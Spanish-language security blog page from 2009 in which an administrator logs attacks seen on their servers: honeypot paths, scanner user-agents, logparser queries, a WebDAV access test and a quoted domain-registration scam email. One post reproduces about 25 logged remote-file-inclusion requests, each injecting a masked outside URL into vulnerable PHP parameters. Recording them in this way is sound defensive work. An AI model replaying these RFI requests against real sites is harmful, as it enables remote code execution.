Preparar despliegue de honeypot

May 31, 2009

Incluir las carpetas que rastrean normalmente los scanners para ver el ataque que intentan:

  • /user/soapCaller.bs
  • /roundcube/
  • /webmail/
  • /abc.php
  • /pp/anp.php
  • /thisdoesnotexistahaha.php
  • /cmd.php
  • /portal/cacti/cmd.php
  • /portal/cmd.php
  • /stats/cmd.php
Posted by ataqueservidor
Filed in Honeypot
Leave a Comment »

User-agent “Morfeus Fucking Scanner”

May 31, 2009

Other bot scanner

Posted by ataqueservidor
Filed in Scanner
Leave a Comment »

Vulnerabilidad explotada WebDAV

May 28, 2009

Si intentamos acceder a una carpeta protegida con “Autenticación de Windows integrada” y no conocemos el usuario y el password obtenemos esta respuesta del servidor:

HTTP 401.2 – Unauthorized: Logon failed due to server configuration Servicios de Internet Information Server

Y en el servidor obtenemos esta entrada:

2009-05-28 20:45:09 192.168.1.34 192.168.1.33 GET /php – 401 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) -

Explotando la vulnerabilidad en WebDAV, obtenemos acceso:

2009-05-28 17:37:42 192.168.1.34 192.168.1.33 GET /p/hp/password.txt – 200 cadaver/0.23.2+neon/0.28.0 -

Logramos ver el contenido de password.txt.

Para explotar la vulnerabilidad hemos modificado Cadaver.

Posted by ataqueservidor
Filed in Vulnerabilidad
Leave a Comment »

libwww-perl/5.814

May 26, 2009

Entrada que deja la ejecución de un perl en el log:

libwww-perl/5.814

Posted by ataqueservidor
Filed in Motores
Leave a Comment »

robotgenius+(http://robotgenius.net)

May 26, 2009

La misión de este robot: http://robotgenius.net/company/index.jsp

Posted by ataqueservidor
Filed in Robots
Leave a Comment »

Motores en cs(User-Agent)

May 26, 2009

Con esta consulta vemos los diferentes cs(User-Agent) que acceden a nuestros log:

logparser “SELECT [cs(User-Agent)], COUNT(*) AS EXPR1 FROM ‘C:\WINDOWS\system32\LogFiles\W3\*’ GROUP BY [cs(User-Agent)] ORDER BY [cs(User-Agent)] desc” -i:IISW3C -o:DATAGRID

Si queremos localizar un User-Agent:

logparser “SELECT * FROM ‘C:\WINDOWS\system32\LogFiles\W3\*’ WHERE cs(User-Agent) like ‘%robotgenius%’” -i:IISW3C -o:DATAGRID

Posted by ataqueservidor
Filed in Motores
Leave a Comment »

cs(User-Agent) winproxy/1.0+(CP/M;+16-bit) 2

May 26, 2009

WinProxy 1.5.x : User’s Manual : http://www.winproxy.cz/download/WinProxy_EN.pdf

Entrada en el log:

winproxy/1.0+(CP/M;+16-bit) 2

Posted by ataqueservidor
Filed in Proxy
Leave a Comment »

Scanner RFI en Perl

May 26, 2009

Scanner detectado en los logs: http://site.mynet.com/senkofiles/perlrfiscanner.txt

- – [26/May/2009:09:22:15 +0200] “GET /Forums/admin/index.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1″ 404 325
 - – [26/May/2009:09:22:15 +0200] “GET /forum/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 328
 - – [26/May/2009:09:22:16 +0200] “GET /impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 322
 - – [26/May/2009:09:22:16 +0200] “GET /forums/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 329
 - – [26/May/2009:09:22:16 +0200] “GET /webcalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 339
 - – [26/May/2009:09:22:16 +0200] “GET /WebCalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 339
 - – [26/May/2009:09:22:16 +0200] “GET /cacti/include/config_settings.php?config[include_path]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
 - – [26/May/2009:09:22:17 +0200] “GET /webcalendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 335
 - – [26/May/2009:09:22:17 +0200] “GET /calendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
 - – [26/May/2009:09:22:17 +0200] “GET /calendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 332
 - – [26/May/2009:09:22:17 +0200] “GET /kalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
 - – [26/May/2009:09:22:17 +0200] “GET /webcal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 334
 - – [26/May/2009:09:22:17 +0200] “GET /cal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 331
 - – [26/May/2009:09:22:18 +0200] “GET /appserv/main.php?appserv_root=http://xxx/appserv/t.txt? HTTP/1.1″ 404 319
 - – [26/May/2009:09:22:18 +0200] “GET /includes/db_adodb.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 324
 - – [26/May/2009:09:22:18 +0200] “GET /includes/session.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 323
 - – [26/May/2009:09:22:18 +0200] “GET /modules/projects/gantt.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 329
 - – [26/May/2009:09:22:18 +0200] “GET /modules/projects/gantt2.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
 - – [26/May/2009:09:22:19 +0200] “GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 332
 - – [26/May/2009:09:22:19 +0200] “GET /modules/admin/vw_usr_roles.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 333
 - – [26/May/2009:09:22:19 +0200] “GET /modules/public/calendar.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
 - – [26/May/2009:09:22:19 +0200] “GET /modules/public/date_format.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 333
 - – [26/May/2009:09:22:19 +0200] “GET /yabbse/Sources/Packages.php?sourcedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
 - – [26/May/2009:09:22:20 +0200] “GET /yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 338
 - – [26/May/2009:09:22:20 +0200] “GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1″ 404 348

Posted by ataqueservidor
Filed in Scanner
Leave a Comment »

Domain name scams

May 22, 2009

Ha llegado un nuevo mensaje de acoso al dominio:

(If you are NOT CEO,please forward this to your CEO or your legal department, because this is urgent.Thanks.)

 Dear CEO,

 We received a formal application from a person who is called Peter Alldis is applying to register “Dominio” as their domain names and Internet brand in Hong Kong and also in Asia on May 22, 2009. During our auditing procedure we find out that the alleged Peter Alldis has no trade mark, brand nor patent even similar to that word. As authorized anti-cybersquatting organization we hereby suspect the alleged Peter Alldis to be a domain or trademark grabber. Hence we need you confirmation for two things, First of all, whether this alleged Peter Alldis is your business partner or distributor in Asia.

Secondly, whether you are interested in registering these domains and internet brand instead of that alleged person.(The alleged Peter Alldis will be entitled to obtain a domain not needed by original trademark owner.)

If you are not in charge of this please forward this email to appropriate dept.

This is a letter for confirmation. If the mentioned third party is your business partner or distributor in Asia and you are not interested in register these domains and internet brand  please DO NOT reply. We will automatically confirm application from your business partner after this audit procedure.

 Best Regards,

  Eddy

 Registration Commissioner

 Mail:eddy@worldwidesolution.org

Web:www.worldwidesolution.org

Que mala pinta tiene esto…

Posted by ataqueservidor
Filed in Ingeniería social
Leave a Comment »

Copssh + \LogFiles + tail -f

May 21, 2009

Con estos pasos podemos utilizar el comando “tail -f” en Windows Server 2003:

  1. Instalamos Copssh (http://www.openssh.org/index.html)
  2. Agregamos el enlace donde están los LogFiles (Abrir shell y ejecutar el comando: ln -s /cygdrive/c/WINDOWS/System32/LogFiles logs)
  3. Ejecutamos tail -f
Posted by ataqueservidor
Filed in Logs
Leave a Comment »
« Older Entries